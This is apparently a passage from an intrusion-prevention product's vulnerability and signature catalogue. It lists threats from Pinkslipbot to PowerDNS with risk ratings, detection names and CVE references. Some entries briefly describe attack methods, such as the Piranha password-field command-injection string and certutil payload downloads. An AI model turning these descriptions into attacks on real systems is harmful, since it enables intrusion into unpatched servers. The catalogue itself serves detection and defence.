Situation: Generic_CS-Pinkslip-Bot-Traffic
HTTP_CSU-Pinkslip-Bot-Traffic
HTTP_CRL-Pinkslip-Bot-Traffic
FTP_CS-Pinkslip-Bot-Traffic
Back to top

Pinkslipbot-Trojan

About this vulnerability: Pinkslipbot trojan
Risk: High
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Pinkslipbot is a trojan horse program that provides a backdoor to the infected system.
Situation: HTTP_CRL-Pinkslipbot-Trojan
Back to top

Piranha-Passwd-Php3-Sys-Compromise

About this vulnerability: Piranha web GUI exposure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Red Hat Linux 6
Software: Red Hat Piranha Virtual Server
Type: Malfunction
Description: Use of the passwd.php3 CGI script in Red Hat Piranha Virtual Server Package was detected. It is possible for any user who can authenticate to the Piranha package to execute commands by entering 'something;some-command' into the password fields. Everything after the semicolon is executed with the Web server privileges.
References:
CVE-2000-0322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0322
BID-1149
http://www.securityfocus.com/bid/1149
Back to top

Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service

About this vulnerability: A vulnerability in Pivotal RabbitMQ
Risk: Moderate
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pivotal RabbitMQ
Type: Format String
Description: There has been report a denial-of-service vulnerability in Pivotal RabbitMQ. Successful exploitation could lead in denial of service conditions.
Situation: HTTP_CSH-Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service
References:
CVE-2019-11287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11287
Back to top

Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection

About this vulnerability: A vulnerability in Pivotal Spring Data Commons
Risk: Moderate
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pivotal Spring
Type: Input Validation
Description: Incorrect input validation in the isWritableProperty function causes an expression language injection vulnerability in the Sprig Framework. A successful exploit may allow an attacker to execute arbitrary code on the target system remotely without authentication.
Situation: HTTP_CRL-Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection
References:
CVE-2018-1273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1273
Back to top

Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution

About this vulnerability: A vulnerability in Pivotal Spring Framework
Risk: High
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pivotal Spring
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Pivotal Spring Framework. The vulnerability is due to improper handling of user-supplied input to a STOMP broker in the spring-messaging module. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted message to the STOMP broker. Successful exploitation could lead to code execution in the context of the service.
Situation: WebSocket_CS-Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution
References:
CVE-2018-1270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1270
Back to top

Pivotal-Spring-Security-oauth-SpelView-Code-Execution

About this vulnerability: A vulnerability in IBM WebSphere Application Server
Risk: Moderate
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Improper input validation can be used to exploit Pivotal Spring Security OAuth.
Situation: HTTP_CRL-Pivotal-Spring-Security-oauth-SpelView-Code-Execution
References:
CVE-2016-4977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4977
Back to top

Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in Piwigo detected
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Piwigo
Type: SQL Injection
Description: A vulnerability in Piwigo, version 13.5.0 and before, which allows remote attackers to retrieve usernames and 13.5.0 and before passwords of other users through SQL injection using the filter_user_id parameter.
Situation: HTTP_CRL-Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection
References:
CVE-2023-26876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876
Back to top

PlaySMS-Unauthenticated-Template-Injection-Code-Execution

About this vulnerability: A vulnerability in PlaySMS
Risk: High
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Unix; Linux; Windows
Software: PlaySMS
Type: Input Validation
Description: There exists a vulnerability in PlaySMS, versions before 1.4.3, which allows remote attackers to execute arbitrary code via the username parameter, due to insufficient input validation.
Situation: HTTP_CRL-PlaySMS-Unauthenticated-Template-Injection-Code-Execution
References:
CVE-2020-8644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8644
Back to top

Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE

About this vulnerability: A vulnerability in Plex Media Server plugin
Risk: High
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Platform: Windows
Software: Plex Media Server plugin
Type: Insecure Configuration
Description: There exists a vulnerability in Plex Media Server plugin, versions prior to 1.19.3, which allows remote attackers to execute arbitrary code by uploading Dict files to custom photo libraries, modifying the local app path to point to these new libraries, and restarting plexapp.system to achieve code execution.
Situation: HTTP_CSU-Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE
References:
CVE-2020-5741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5741
Back to top

Plex-Media-Server-Reflection-DDoS-CVE-2021-33959

About this vulnerability: An attempt to exploit a vulnerability in Plex Media Server detected
Risk: High
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Plex Media Server
Type: Input Validation
Description: Plex media server 1.21 and before is vulnerable to distributed denial-of-service (DDoS) reflection attacks via the plex service.
Situation: Generic_UDP-Plex-Media-Server-Reflection-DDoS-CVE-2021-33959
References:
CVE-2021-33959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33959
Back to top

Plixer-Scrutinizer-Authentication-Bypass

About this vulnerability: A Plixer Scrutinizer Authentication Bypass vulnerability.
Risk: High
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Plixer
Type: Insecure Configuration
Description: A vulnerability in Plixer, versions before 9.5.0, in cgi-bin/admin.cgi in the web console, which allows remote attackers to add administrative accounts without authentication, via a userprefs action.
Situation: HTTP_CRL-Plixer-Scrutinizer-Authentication-Bypass
References:
CVE-2012-2626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2626
OSVDB-84318
http://www.osvdb.org/84318
Back to top

PluginDetect

About this vulnerability: PluginDetect, a plugin detector script
Risk: Moderate
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Javascript Injection
Description: PluginDetect is a Javascript library used for identifying the plugins that the browser uses.
Situation: File-Text_PluginDetect-Script
Back to top

Plugx-Trojan-Activity-Detected

About this vulnerability: PlugX Trojan
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: PlugX is a Remote Access Tool (RAT). A Remote Access Tool gives an intruder access to the infected machine with administrative rights.
Situation: HTTP_CSH-Plugx-Trojan-Activity-Detected
Back to top

PmWiki-Remote-PHP-Code-Injection

About this vulnerability: A PmWiki Remote PHP Code Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PmWiki
Type: Input Validation
Description: A vulnerability in PmWiki, versions 2.0.0 to 2.2.34, in the PageListSort function of scripts/pagelist.php, which allows remote attackers to execute arbitrary code via PHP sequences in a crafted order parameter in a pagelist directive.
Situation: HTTP_CRL-PmWiki-Remote-PHP-Code-Injection
References:
CVE-2011-4453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4453
BID-50776
http://www.securityfocus.com/bid/50776
OSVDB-77261
http://www.osvdb.org/77261
Back to top

PNG-GD-Graphics-Library-Rowbytes-And-Height-BOF

About this vulnerability: Buffer overflow in GD Graphics Librarys PNG handling code
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: GD Graphics Library
Type: Buffer Overflow
Description: The GD graphics library has a buffer overflow vulnerability in the code that handles PNG images. User-supplied rowbytes and height are multiplied together and the result is used as the size of a buffer. By creating a .png image that contains suitable height, width and bitdepth values, remote attackers can execute arbitrary code on a system that opens the image using GD graphics library. PHP is known to use the library to manipulate images.
Situation: File-PNG_PNG-Image-With-Large-Height-Or-Width-Value
References:
CVE-2004-0990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0990
BID-11523
http://www.securityfocus.com/bid/11523
OSVDB-11190
http://www.osvdb.org/11190
Back to top

PolarBear-CMS-PHP-File-Upload

About this vulnerability: A PolarBear CMS PHP File Upload vulnerability
Risk: High
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PolarBear CMS
Type: Insecure Configuration
Description: A vulnerability in PolarBear CMS which allows remote attackers to execute arbitrary code by uploading files to a temp directory without authentication via upload.php.
Situation: HTTP_CRL-PolarBear-CMS-PHP-File-Upload
References:
CVE-2013-0803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0803
OSVDB-90627
http://www.osvdb.org/90627
Back to top

Poll-It-Cgi

About this vulnerability: Poll It CGI variable access
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Poll It CGI
Type: Code Injection
Description: Poll It 2.0 has a vulnerability that allows an attacker to set internal variables for a CGI script. This may allow the attacker to access files on the Web server.
References:
CVE-2000-0590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0590
BID-1431
http://www.securityfocus.com/bid/1431
Back to top

Polycom-Shell-HDX-Series-Traceroute-Command-Execution

About this vulnerability: A Polycom Shell HDX Series Traceroute Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Polycom Shell
Type: Input Validation
Description: A vulnerability in Polycom Shell HDX Series wihch allows remote attackers to execute arbitrary payloads with telnet or openssl, through the dev command lan traceroute.
Situation: Telnet_CS-Polycom-Shell-HDX-Series-Traceroute-Command-Execution
Back to top

Ponmocup

About this vulnerability: Ponmocup
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Ponmocup is a Bot that downloads additional malicious content on the infected machine. It can also show unwanted ads for the user.
Situation: Generic_SS-Ponmocup-Activity
HTTP_CSU-Ponmocup-Activity
Back to top

Pony-Downloader-C2-Traffic

About this vulnerability: Pony Downloader C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Pony malware is known to be used as a downloader for additional malware. However, it also has capability to harvest credentials from the infected system.
Situation: HTTP_CS-Pony-Downloader-C2-Traffic
Back to top

POP3-Cyrus-IMAP-Server-POP3-User-Command-Buffer-Overflow

About this vulnerability: POP3 USER command buffer overflow vulnerability in Cyrus IMAP server
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cyrus IMAP Server
Type: Buffer Overflow
Description: When the popsubfolders option is enabled, the POP3 server component of Cyrus IMAP server has a buffer overflow vulnerability in the handling of an excessively long user name argument to the USER command. When exploited succesfully, the vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the target system with the privileges of the server process.
Situation: POP3_User-Command-Buffer-Overflow
References:
CVE-2006-2502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2502
BID-18056
http://www.securityfocus.com/bid/18056
Back to top

POP3-E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow

About this vulnerability: Information disclosure vulnerability in the E-Post Mail Server POP3 service
Risk: Moderate
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: E-Post Mail Server Enterprise; E-Post Mail Server; E-POST EPSTPOP3S.EXE
Type: Buffer Overflow
Description: There is an information disclosure vulnerability in the E-Post Mail Server POP3 service. The vulnerability can be exploited by sending multiple APOP commands with a known username in the same session to disclose the password for the username.
Situation: POP3_E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow
References:
CVE-2008-2049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049
BID-28951
http://www.securityfocus.com/bid/28951
OSVDB-44653
http://www.osvdb.org/44653
Back to top

POP3-MailEnable-POP-Service-Pass-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in MailEnable POP service
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Input Validation
Description: There is a buffer overflow vulnerability in the MailEnable POP service. The vulnerability can be exploited with a very long parameter string to the PASS command. This may lead to denial of service or code execution in the context of the vulnerable service.
Situation: POP3_MailEnable-POP-Service-Pass-Command-Buffer-Overflow
References:
CVE-2006-6605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6605
BID-21645
http://www.securityfocus.com/bid/21645
Back to top

POP3-MDaemon-POP3-Server-User-And-Apop-Commands-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of the USER and APOP commands in MDaemon POP3 server
Risk: High
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: MDaemon POP3 server has a buffer overflow vulnerability in the handling of the user name argument in USER and APOP commands. When exploited succesfully, the vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the target system with the privileges of the server process.
Situation: POP3_MDaemon-POP3-Server-Apop-Command-Buffer-Overflow
POP3_User-Command-Buffer-Overflow
References:
CVE-2006-4364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4364
BID-19651
http://www.securityfocus.com/bid/19651
OSVDB-28125
http://www.osvdb.org/28125
Back to top

POP3-Qualcomm-QPopper-BOF

About this vulnerability: Buffer overflow in Qualcomm QPopper
Risk: Critical
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Qpopper
Type: Buffer Overflow
Description: Qualcomm's qpopper prior to version 2.5 contains numerous buffer overflows. An attacker can exploit these to execute arbitrary commands on the system as the superuser.
Situation: POP3_CS-Generic-Buffer-Overflow-Attack
References:
CVE-1999-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0006
BID-133
http://www.securityfocus.com/bid/133
Back to top

POP3-RevilloC-MailServer-Long-User-Command-Buffer-Overflow

About this vulnerability: RevilloC MailServer long USER command causes a buffer overflow
Risk: High
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RevilloC MailServer
Type: Buffer Overflow
Description: RevilloC MailServer has a buffer overflow vulnerability in the handling of long arguments to the USER command. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code with the privileges of the server process by sending a crafted USER command.
Situation: POP3_User-Command-Buffer-Overflow
References:
CVE-2006-1124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1124
BID-16997
http://www.securityfocus.com/bid/16997
OSVDB-23735
http://www.osvdb.org/23735
Back to top

Popmonster

About this vulnerability: PopMonster
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PopMonster
Type: Misconfiguration
Description: PopMonster is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Popmonster
Back to top

Popper_Webmail_Remote_Code_Execution

About this vulnerability: Popper Webmail Remote Code Execution
Risk: Low
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Popper Webmail
Type: Buffer Overflow
Description: The Popper Webmail software can be tricked into executing arbitary code by providing it with an url from a site that is controlled by the attacker.
Situation: HTTP_CSU-Popper-Webmail-Remote-Code-Execution
References:
CVE-2005-1870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870
OSVDB-17085
http://www.osvdb.org/17085
Back to top

PoPToP-PPTP-Server-Negative-Read-BOF

About this vulnerability: Buffer overflow in PoPToP PPTP Server allows arbitrary code execution
Risk: Moderate
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: PoPToP PPTP Server
Type: Buffer Overflow
Description: PoPToP PPTP Server vulnerable to a buffer overflow, caused by improper bounds checking of the packet's header length by the ctrlpacket.c code. By sending a specially-crafted PPTP packet, a remote attacker could overflow a buffer and cause the system to crash or execute arbitrary code on the server.
Situation: PPTP_PoPToP-PPTP-Server-Negative-Read-BOF-1
PPTP_PoPToP-PPTP-Server-Negative-Read-BOF-2
References:
CVE-2003-0213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0213
BID-7316
http://www.securityfocus.com/bid/7316
OSVDB-3293
http://www.osvdb.org/3293
Back to top

Portable-Executable-msstyles-File-Transfer

About this vulnerability: Possible msstyles file transfer
Risk: Moderate
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1644-5242
Platform: Windows
Software: <os>
Type: Race Condition
Description: A dynamic link library (DLL) file with contents commonly seen in .msstyles files was seen. If the file originated from an untrusted source, this situation might indicate an attempt to exploit CVE-2023-38146.
Situation: SMB-TCP_CHS-Microsoft-Windows-Themes-Race-Condition
File-Exe_Portable-Executable-msstyles-File-Transfer
Back to top

Portalscan

About this vulnerability: PortalScan
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PortalScan
Type: Misconfiguration
Description: PortalScan id an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Portalscan
HTTP_CSH-Portalscan
Back to top

Possible-Cobalt-Strike-Response

About this vulnerability: A possible response of Cobalt Strike's server was detected
Risk: High
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: A possible response of Cobalt Strike's server was detected. This might indicate that the system from where the traffic originated is compromised.
Situation: HTTP_SHS-Possible-Cobalt-Strike-Response
Back to top

Possible-Malicious-XML-Scriplet

About this vulnerability: Possible malicious XML scriplet was detected
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A scriptlet is a component of Microsoft Windows, which can contain different scripting languages. Scriptlets are also used for malicious activities.
Situation: File-TextId_Possible-Malicious-XML-Scriplet
Back to top

Possible-Metasploit-Generated-Malicious-File-Detected

About this vulnerability: A Possible Metasploit Generated Malicious File Detected
Risk: High
First detected in: sgpkg-ips-1078-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: A possible Metasploit generated malicious file has been detected. These files are commonly encoded in base64 and used for code injection to gain a reverse tcp connection with Metasploit.
Situation: File-Text_Possible-Metasploit-Generated-Malicious-File-Detected
Back to top

Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic

About this vulnerability: Possible Vice Society data exfiltration traffic pattern
Risk: High
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A POST request matching to a traffic pattern generated by a known malicious PowerShell script has been detected. This script is used by Vice Society ransomware group to exfiltrate data from the victim host.
Situation: HTTP_CSU-Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic
Back to top

Possibly-Malicious-Certificate-File

About this vulnerability: Possibly malicious certificate file was detected
Risk: High
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Malicious actors are using Windows' certutil executable on endpoints after initial infection to download crafted certificate files and converting them to executables that are doing the final infection on the system.
Situation: File-Text_Possibly-Malicious-Certificate-File
Back to top

Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Poster Software PUBLISH-iT
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Poster Software PUBLISH-iT
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Poster Software PUBLISH-iT. The vulnerability is due to insufficient validation on the length of entry names in a "styl" record when processing PUI files. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious PUI file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-OLE_Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow
References:
CVE-2014-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0980
BID-65366
http://www.securityfocus.com/bid/65366
OSVDB-102911
http://www.osvdb.org/102911
Back to top

Postfix-IPv6-Relaying-Security-Issue

About this vulnerability: A vulnerability in Postfix
Risk: Low
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Postfix SMTP Server
Type: Malfunction
Description: There is a vulnerability in the way Postfix versions 2.1.3 to 2.1.4-4 handle the relaying of e-mail messages.
Situation: SMTP_CS-Postfix-IPv6-Relaying-Security-Issue
References:
CVE-2005-0337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0337
BID-12445
http://www.securityfocus.com/bid/12445
Back to top

Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption

About this vulnerability: Attempt to exploit vulnerability in Postfix SMTP Server detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Postfix SMTP Server
Type: Malfunction
Description: A memory corruption vulnerability exists in the Postfix SMTP server when the Cyrus SASL library is used with authentication mechanisms other than PLAIN, LOGIN and ANONYMOUS. This vulnerability is due to the Postfix server's reuse of a SASL server handle after an authentication failure. This could result in code execution in the context of the process, which is usually run in the context of the user "postfix".
Situation: SMTP_CS-Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption
References:
CVE-2011-1720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1720
BID-47778
http://www.securityfocus.com/bid/47778
OSVDB-72259
http://www.osvdb.org/72259
Back to top

PostgreSQL-Bit-Substring-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in the PostgreSQL database server
Risk: High
First detected in: sgpkg-ips-290-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: PostgreSQL
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the PostgreSQL database server. A remote authenticated attacker can exploit this vulnerability by sending a crafted SQL query to a vulnerable server to execute arbitrary code or to cause a denial of service condition.
Situation: Generic_CS-PostgreSQL-Bit-Substring-Buffer-Overflow
References:
CVE-2010-0442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0442
BID-37973
http://www.securityfocus.com/bid/37973
OSVDB-62129
http://www.osvdb.org/62129
Back to top

PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass

About this vulnerability: A vulnerability in PostgreSQL PostgreSQL
Risk: High
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PostgreSQL
Type: Malfunction
Description: A security policy bypass vulnerability has been reported in the core server component of the PostgreSQL database server. The vulnerability is due to improper authentication of user accounts with empty passwords for clients that do not use libpq. A remote attacker could send maliciously crafted requests to a vulnerable server. A successful exploitation may result in unauthorized access or modification of data between the client and server.
Situation: Generic_CS-PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass
References:
CVE-2017-7546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546
Back to top

PostgreSQL-Database-Datetime-Buffer-Overflow

About this vulnerability: A vulnerability in PostgreSQL PostgreSQL
Risk: Moderate
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PostgreSQL
Type: Buffer Overflow
Description: A code execution vulnerability has been found in PostgreSQL database server. The vulnerability is due to a stack buffer overflow when handling the Datetime string. A remote attacker can exploit the vulnerability by sending a malicious request to the target server. Successful exploitation could cause a stack buffer overflow resulting in code execution in the context of the the affected service. Unsuccessful attacks can crash the target service process to cause a denial of service condition.
Situation: Generic_CS-PostgreSQL-Database-Datetime-Buffer-Overflow
References:
CVE-2014-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0063
OSVDB-103547
http://www.osvdb.org/103547
Back to top

PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow

About this vulnerability: A vulnerability in PostgreSQL PostgreSQL
Risk: High
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PostgreSQL
Type: Integer Overflow
Description: An integer overflow vulnerability has been found in PostgreSQL Database. The vulnerability is due to improper validation when processing a large number of points for a geometric data type. A remote authenticated attacker could exploit this vulnerability by sending malicious information to a table in a database. Successful exploitation could cause memory corruption resulting in code execution in the context of the the affected service.
Situation: Generic_CS-PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow
References:
CVE-2014-0064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0064
OSVDB-103548
http://www.osvdb.org/103548
Back to top

PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in PostgreSQL Database
Risk: High
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PostgreSQL
Type: Buffer Overflow
Description: A vulnerability in PostgreSQL Database, versions 10.x < 10.9, 11.x < 11.4, 9.4.x < 9.4.23, 9.5.x < 9.5.18, 9.6.x < 9.6.14, which allows remote attackers to execute arbitrary code by sending a crafted request, due to a stack buffer overflow while setting a password.
Situation: Generic_CS-PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow
References:
CVE-2019-10164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10164
Back to top

PostgreSQL-Database-Set-Role-Security-Bypass

About this vulnerability: A vulnerability in PostgreSQL PostgreSQL
Risk: Moderate
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PostgreSQL
Type: Malfunction
Description: A policy bypass vulnerability has been found in PostgreSQL database server. The vulnerability is due to a design weakness when granting a role without ADMIN OPTION. A remote attacker can exploit the vulnerability to cause a policy bypass allowing execution of a security-restricted operation or a SECURITY DEFINER function.
Situation: Generic_CS-PostgreSQL-Database-Set-Role-Security-Bypass
References:
CVE-2014-0060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0060
OSVDB-103544
http://www.osvdb.org/103544
Back to top

PostgreSQL-Insecure-Library-Mapping-Vulnerability

About this vulnerability: A remote code execution vulnerability in the PostgreSQL database server
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: PostgreSQL
Type: Code Injection
Description: There is a vulnerability on some default Linux installations of PostgreSQL where the service account is able to write to and source libraries from the /tmp directory, allowing remote execution of arbitrary code.
Situation: Generic_CS-PostgreSQL-Source-From-Tmp
References:
CVE-2007-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3280
Back to top

Potentially-Malicious-SYLK-File

About this vulnerability: Potentially malicious SYLK file detected
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Symbolic link (SYLK) files are usually used to exchange data between spreadsheets. An attacker can craft a malicious SYLK file and send it to the target user. Opening the file can lead in system compromise.
Situation: File-Text_Potentially-Malicious-SYLK-File
Back to top

PowerD-WHATIDO-Format-String

About this vulnerability: Power Daemon (powerd) format string vulnerability in the WHATIDO variable
Risk: Moderate
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Power Daemon
Type: Format String
Description: Power Daemon (powerd) versions 2.0.2 and earlier have a format string vulnerability. A malicious server can supply connecting powerd applications with a crafted WHATIDO command that will lead to arbitrary remote code execution.
Situation: Generic_PowerD-WHATIDO-Format-String
References:
CVE-2006-0681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0681
BID-16582
http://www.securityfocus.com/bid/16582
Back to top

PowerDNS-Authoritative-Server-CVE-2021-36754-DoS

About this vulnerability: A vulnerability in PowerDNS Authoritative Server.
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Linux; Unix
Software: PowerDNS Authoritative Server
Type: Malfunction
Description: A vulnerability in PowerDNS Authoritative Server, version 4.5.0, which allows remote attackers to cause a denial of service condition by sending a crafted packet to the target server, due to an out-of-bounds exception caused by a specific query with QTYPE 65535.
Situation: DNS-UDP_PowerDNS-Authoritative-Server-CVE-2021-36754-DoS
References:
CVE-2021-36754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36754
Back to top

PowerDNS-Authoritative-Server-DNS-Packet-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in PowerDNS PowerDNS Authoritative Server
Risk: Moderate
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PowerDNS Authoritative Server
Type: Input Validation
